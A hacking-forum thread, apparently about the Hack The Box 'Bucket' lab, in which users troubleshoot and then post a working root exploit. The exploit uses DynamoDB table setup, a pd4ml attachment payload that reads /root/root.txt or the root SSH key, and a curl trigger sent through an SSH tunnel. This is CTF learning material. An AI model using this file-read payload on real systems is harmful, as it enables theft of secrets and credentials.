TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#61
Can someone help me with the root part? I don't get POST-Request work on Port 8000. Or is there another way?
Reply
#62
for the last part—if the table and item are not there, create them!
Reply
#63
(October 19, 2020 at 06:44 PM)dipshit Wrote: for the last part—if the table and item are not there, create them!

I can't get it to work and am unsure if I am setting the table up correctly. I am doing this via the local dynamo instance over at http://s3.bucket.htb/shell/

I create the alerts table with a string field title. I then put item with title Ransomware and give it a data property of the /root/root.txt. I tunnel and then post to curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts and I don't see any pdf in /var/www/bucket-app/files


`
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});



var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
`

Where am I going wrong? :/
Reply
#64
(October 19, 2020 at 07:13 PM)southerndarkness Wrote:
(October 19, 2020 at 06:44 PM)dipshit Wrote: for the last part—if the table and item are not there, create them!

I can't get it to work and am unsure if I am setting the table up correctly. I am doing this via the local dynamo instance over at http://s3.bucket.htb/shell/

I create the alerts table with a string field title. I then put item with title Ransomware and give it a data property of the /root/root.txt. I tunnel and then post to curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts and I don't see any pdf in /var/www/bucket-app/files


`
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});



var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
`

Where am I going wrong? :/


This script where put him?
-—-———————————-
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

——————————-
Reply
#65
(October 19, 2020 at 10:07 PM)Kali76 Wrote:
(October 19, 2020 at 07:13 PM)southerndarkness Wrote:
(October 19, 2020 at 06:44 PM)dipshit Wrote: for the last part—if the table and item are not there, create them!

I can't get it to work and am unsure if I am setting the table up correctly. I am doing this via the local dynamo instance over at http://s3.bucket.htb/shell/

I create the alerts table with a string field title. I then put item with title Ransomware and give it a data property of the /root/root.txt. I tunnel and then post to curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts and I don't see any pdf in /var/www/bucket-app/files


`
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});



var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
`

Where am I going wrong? :/


This script where put him?
-—-———————————-
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

——————————-

I'm putting that in the local dynamo shell to create the alerts table with item titled Ransomware. I'm trying to trigger the conditional in /var/www/bucket-app/index.php which generates result.pdf by posting to /?actions=get_alerts
Reply
#66
(October 19, 2020 at 10:55 PM)southerndarkness Wrote:
(October 19, 2020 at 10:07 PM)Kali76 Wrote:
(October 19, 2020 at 07:13 PM)southerndarkness Wrote:
(October 19, 2020 at 06:44 PM)dipshit Wrote: for the last part—if the table and item are not there, create them!

I can't get it to work and am unsure if I am setting the table up correctly. I am doing this via the local dynamo instance over at http://s3.bucket.htb/shell/

I create the alerts table with a string field title. I then put item with title Ransomware and give it a data property of the /root/root.txt. I tunnel and then post to curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts and I don't see any pdf in /var/www/bucket-app/files


`
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});



var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
`

Where am I going wrong? :/


This script where put him?
-—-———————————-
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

——————————-

I'm putting that in the local dynamo shell to create the alerts table with item titled Ransomware. I'm trying to trigger the conditional in /var/www/bucket-app/index.php which generates result.pdf by posting to /?actions=get_alerts

i didn't understand, how do you put it in the shell?
Reply
#67
Go to http://s3.bucket.htb/shell/ and put the js there. It creates the alerts table.
Reply
#68
Instead of futzing about with the js here are the aws cli commands I run:


# create the table with title field
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb


# insert an item with Ransomware as title with path of flag
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "/root/root.txt"}}' \
    --endpoint-url=http://s3.bucket.htb


I then curl after setting up a tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]
curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts -vvvv

But I don't see any pdf generated in /var/www/bucket-app/files 

:(
Reply
#69
It shows up for a few seconds then disappears. If you get a 200 back with a bit of a delay it means it worked. But you will just get a pdf back with the string '/root/root.txt' inside. It doesn't actually read root.txt.
Reply
#70
(October 20, 2020 at 03:01 AM)jmax Wrote: It shows up for a few seconds then disappears. If you get a 200 back with a bit of a delay it means it worked. But you will just get a pdf back with the string '/root/root.txt' inside. It doesn't actually read root.txt.

Yeah the data field for the ransomware titled item of the alert table isn't correct. I saw file:///root/root.txt before but it still was unable to put contents of the file in the pdf. The html has the actual string as I. The path and the pdf doesn't have a  proper attachment. Hmmmmm.
Reply
#71
finally rooted.
tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]


create table:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb


create item:
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb


trigger pd4ml generation:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string
Reply
#72
(October 20, 2020 at 05:58 AM)southerndarkness Wrote: finally rooted.
tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]


create table:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb


create item:
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb


trigger pd4ml generation:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string

thanks Bro i got root.txt, how do a got a shell of root? I can inject my id_rsa.pub in authorized_keys?
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Cereal.htb discussion (no tutorial) Kali76 9 892 Yesterday at 10:15 PM
Last Post: Kali76
TUTORIAL Phonebook Discussion internet dreams 13 1,491 November 14, 2020 at 09:25 PM
Last Post: Masterofntn
FLAG free user flag for bucket htb lamehacker 11 1,774 November 14, 2020 at 03:25 AM
Last Post: lamehacker

 Users browsing this thread: 1 Guest(s)